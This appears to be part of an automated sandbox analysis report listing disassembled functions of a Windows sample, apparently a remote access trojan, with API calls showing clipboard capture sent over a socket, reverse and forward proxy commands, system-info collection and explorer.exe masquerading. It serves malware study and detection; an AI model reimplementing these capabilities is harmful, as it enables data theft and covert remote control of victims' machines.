                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                • __freea.LIBCMT ref: 00454003
                                • __freea.LIBCMT ref: 0045400F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID: \@E
                                • API String ID: 201697637-1814623452
                                • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00416940 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 46clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                • String ID: !D@$hdF
                                • API String ID: 2172192267-3475379602
                                • Opcode ID: 604ff0e650b7cbf0eb05cc5d47dbbf01a5686cd6b593f2ae7640030b5bdbb505
                                • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                • Opcode Fuzzy Hash: 604ff0e650b7cbf0eb05cc5d47dbbf01a5686cd6b593f2ae7640030b5bdbb505
                                • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                • __dosmaperr.LIBCMT ref: 0043A8A6
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                • __dosmaperr.LIBCMT ref: 0043A8E3
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                • __dosmaperr.LIBCMT ref: 0043A937
                                • _free.LIBCMT ref: 0043A943
                                • _free.LIBCMT ref: 0043A94A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                • String ID:
                                • API String ID: 2441525078-0
                                • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                • TranslateMessage.USER32(?), ref: 0040557E
                                • DispatchMessageA.USER32(?), ref: 00405589
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: 76a1ce86a08fa156be11bd966dd8909bd5a19347d38f21f04759c98b853e25d9
                                • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                • Opcode Fuzzy Hash: 76a1ce86a08fa156be11bd966dd8909bd5a19347d38f21f04759c98b853e25d9
                                • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                • String ID: 0VG$0VG$<$@$Temp
                                • API String ID: 1704390241-2575729100
                                • Opcode ID: a68fe472555a221cc9b32b7d705479c144bd783cb6920b13d56d72ce3c36b1e5
                                • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                • Opcode Fuzzy Hash: a68fe472555a221cc9b32b7d705479c144bd783cb6920b13d56d72ce3c36b1e5
                                • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410E61 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                • int.LIBCPMT ref: 00410E81
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                • String ID: ,kG$0kG$@!G
                                • API String ID: 3815856325-312998898
                                • Opcode ID: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                • Opcode Fuzzy Hash: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 7b2cf5faf853fa98289cc991659be0cbca7e258cea3468f32c8f6232fd3e676c
                                • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                • Opcode Fuzzy Hash: 7b2cf5faf853fa98289cc991659be0cbca7e258cea3468f32c8f6232fd3e676c
                                • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00448135
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00448141
                                • _free.LIBCMT ref: 0044814C
                                • _free.LIBCMT ref: 00448157
                                • _free.LIBCMT ref: 00448162
                                • _free.LIBCMT ref: 0044816D
                                • _free.LIBCMT ref: 00448178
                                • _free.LIBCMT ref: 00448183
                                • _free.LIBCMT ref: 0044818E
                                • _free.LIBCMT ref: 0044819C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C68F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                Strings
                                • DisplayName, xrefs: 0041C73C
                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                • API String ID: 1332880857-3614651759
                                • Opcode ID: 1a8a8a53396f0a73c7c7ebd617f4a58ea8be179d7647117c14ca7f9aabbf758a
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 1a8a8a53396f0a73c7c7ebd617f4a58ea8be179d7647117c14ca7f9aabbf758a
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-3604713145
                                • Opcode ID: 17cf8a492e2e01fb16bba24d2f661c5d0ec595d5f822586ab64a53fc84a2cb20
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: 17cf8a492e2e01fb16bba24d2f661c5d0ec595d5f822586ab64a53fc84a2cb20
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: 8036abd7ebb146444e02fef837d9d56b0e439923b7ca1e678c0d610ff0acf444
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: 8036abd7ebb146444e02fef837d9d56b0e439923b7ca1e678c0d610ff0acf444
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\xi0TpAxHGMsm.exe), ref: 0040749E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • _strftime.LIBCMT ref: 00401D50
